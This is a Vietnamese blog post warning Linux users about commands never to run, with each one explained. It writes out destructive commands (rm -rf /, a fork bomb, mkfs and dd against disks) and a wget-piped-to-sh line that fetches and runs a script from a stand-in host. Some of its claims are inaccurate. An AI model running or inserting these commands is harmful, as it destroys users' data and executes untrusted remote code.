Tổng hợp 8 lệnh cấm đừng bao giờ chạy trên Linux
https://anonyviet.com/8-lenh-cam-tren-linux/
Last updated
https://anonyviet.com/8-lenh-cam-tren-linux/
Last updated
by Lmint 20/10/2018 - Updated on 21/10/2018 in Linux Reading Time: 7 mins readA A 3
Dù bạn là người sử dụng Linux lâu năm hay vừa mới sử dụng thì cũng nên đọc qua bài này. Linux là hệ điều hành mã nguồn mở không giới hạn hay cấm kỵ bất cứ câu lệnh nào. Đồng nghĩa với việc bạn có thể làm mọi thứ trên Linux với giao diện dòng lệnh Terminal.
Terminal là cửa sổ dòng lệnh làm nên tên tuổi của hệ điều hành này. Bạn có thể làm mọi thứ với Terminal từ việc viết code, dò lỗi, hack… Cửa sổ này sẽ giúp bạn thực thi mọi câu lệnh mà bạn muốn. Thậm chí bạn có thể tự tay xoá luôn cả hệ điều hành Linux chỉ với vài lệnh được gõ vào Terminal.
04/11/2022 - UPDATED ON 08/11/2022
26/10/2022 - UPDATED ON 27/10/2022
Terminal sẽ nhanh chóng thực thi câu lệnh của bạn ngay sau khi ấn Enter mà không cần xác nhận gì. Điều đó làm nó trở nên mạnh mẽ và cũng nguy hiểm không lường. Hãy thử tưởng tượng nếu một câu lệnh có khả năng gây hại cho máy bạn được gõ vào và chạy trên Terminal?
Hậu quả là không thể lường trước được, bởi vì Terminal chỉ nhận lệnh và chạy. Nó không cần biết câu lệnh đó có gây hại cho chủ nhân nó hay là không? Nếu bạn sử dụng Linux bạn cần biết 08 câu lệnh sau đây để tránh trường hợp tự làm hại chính mình nhé !!
Trên hệ điều hành Ubuntu, câu lệnh sẽ được chạy với quyền admin nếu có từ khoá sudo trước đó. Nhưng trên Linux thì mọi câu lệnh luôn được chạy với quyền quản trị. Do đó chúng ta cần phải lưu ý kỹ các lệnh để tránh tự làm hại máy của mình.
Câu lệnh xoá mọi thứ (kể cả hệ điều hành)
Nếu bạn gõ vào Terminal lệnh rm -rf /
sẽ đồng nghĩa với việc xoá tất cả mọi thứ hiện tại trên máy tính. Câu lệnh này sẽ được hiểu như sau:
rm là từ khoá đại diện cho hành động cần xoá một thứ gì đó.
-rf là cụm từ ám chỉ câu lệnh rm ở trên chạy và xoá sạch các File và Folders bên trong nơi được chỉ định.
/ Nếu bạn không ghi gì sau dấu / thì Linux sẽ hiểu là bắt đầu chọn từ gốc (đồng nghĩa với mọi thứ).
Do đó khi bạn chạy câu lệnh này thì Linux sẽ bắt đầu xoá tất cả các file được chỉ định từ ngoài vào trong. Ổ cứng của bạn sẽ bị dọn sạch sẽ (bao gồm luôn các file hệ thống).
:(){ :|: & };: – Fork Bomb
Câu lệnh này tuy trông đơn giản nhưng cực kỳ nguy hiểm nếu bạn không biết.
Khi lệnh này được thực thi nó sẽ tự gọi lại hàm shell để tự tạo lại chính nó. Đây giống như một con virus tự copy chính nó và sinh sản ra thêm nhiều con khác. RAM và CPU máy tính của bạn sẽ bị quá tải và gây treo máy. Đây là nền tảng cơ bản mô phỏng cho một cuộc tấn công DDOS.
mkfs.ext4 /dev/sda1 – Định dạng lại ổ đĩa cứng
Câu lệnh này cũng đơn giản và nguy hiểm không kém, và nó cũng rất dễ hiểu.
Lệnh này sẽ được hiểu như sau:
mkfs.ext4 sẽ tạo ra một file hệ thống dạng ext4 mới trên thiết bị của bạn.
/dev/sda1 – Lệnh này chỉ định phân vùng đầu tiên (phân vùng chính) trên ổ đĩa của bạn.
Khi chạy lệnh, nó sẽ xoá hết dữ liệu trong phân vùng đầu tiên của ổ đĩa và thế vào đó một file định dạng phân vùng mới. Tuy nhiên, câu lệnh này cũng có thể được tuỳ biến lại thành mkfs.ext3 /dev/sdb2
để định dạng phân vùng thứ 2 trong ổ đĩa. Việc định dạng này sẽ làm ổ đĩa mất toàn bộ dữ liệu và không thể phục hồi.
command > /dev/sda – Ghi trực tiếp vào ổ đĩa cứng
Câu lệnh này cũng hoạt động gần giống câu lệnh ở trên. Nó sẽ gửi dữ liệu đầu ra đến phân vùng đầu tiên của ổ cứng và ghi đè lên đó. Điều này sẽ làm hỏng các File hệ thống của bạn, có thể làm hỏng luôn cả hệ điều hành nên hãy cẩn thận.
Câu lệnh này sẽ được hiểu như sau:
command – Thực thi câu lệnh
> Gửi dữ liệu đầu ra đến môt nơi được chỉ định.
/dev/sda Ghi đè dữ liệu đầu ra lên ổ đĩa cứng.
dd if=/dev/random of=/dev/sda – Xả rác vào ổ đĩa cứng
Khi chạy lệnh dd if=/dev/random of=/dev/sda
sẽ khiến dữ liệu trong ổ đĩa cứng của bạn bị phân tán. Điều này sẽ dẫn đến nhiều File rác. Câu lệnh này được hiểu như sau:
dd – Copy dữ liệu từ nơi này sang nơi khác ở mức độ thấp (copy một phần).
if=/dev/random – Tạo ngẫu nhiên dữ liệu đầu ra. Bạn cũng sẽ thấy một số phân vùng khác được tạo ra như /dev/zero…
of=/dev/sda – Ghi dữ liệu vào phân vùng đầu tiên của ổ đĩa và ghi đè các file được chỉ định ngẫu nhiên.
mv ~ /dev/null – Chuyển Phân vùng Home của hệ thống vào hố đen
phân vùng /dev/null là một phân vùng đặc biệt tồn tại ẩn và không thể tìm thấy (giống như hố đen). Di chuyển bất cứ File nào vào đây cũng đồng nghĩa việc tự huỷ file đó. Để thực hiện việc này bạn cần chạy lệnh như sau:
mv – di chuyển tệp hoặc thư mục đến một phân vùng khác.
~ – Đại diện cho toàn bộ phân vùng Home của hệ thống
/dev/null – Giống như hố đen mình nói ở trên, di chuyển thư mục vào đây đồng nghĩa với việc tự huỷ nó.
wget http://example.com/something -O – | sh – Download và chạy Script từ web
Câu lệnh này sẽ truy cập tới một trang web. Nếu trang web đó chứa một đoạn Script mà Linux có thể hiểu thì nó sẽ chạy đoạn Script đó. Đây cũng là cách người khác có thể tấn công và phá huỷ hệ điều hành Linux của bạn trong tích tắc.
wget – Download một file nào đó từ một đĩa chỉ web được chỉ định.
http://example.com/something – Trang web mà lệnh wget sẽ download
Người mà bạn nên trông đợi, chỉ có bản thân bạn mà thôi. Đừng phụ thuộc quá nhiều vào người khác để đến khi nhìn lại bản thân thì chẳng làm được gì nên trò.
Bài viết đạt: 5/5 - (100 bình chọn)Tags: 8 lệnh cấm trên linuxhackhướng dẫn kali linuxlệnh linuxlinuxPrevious PostNext Post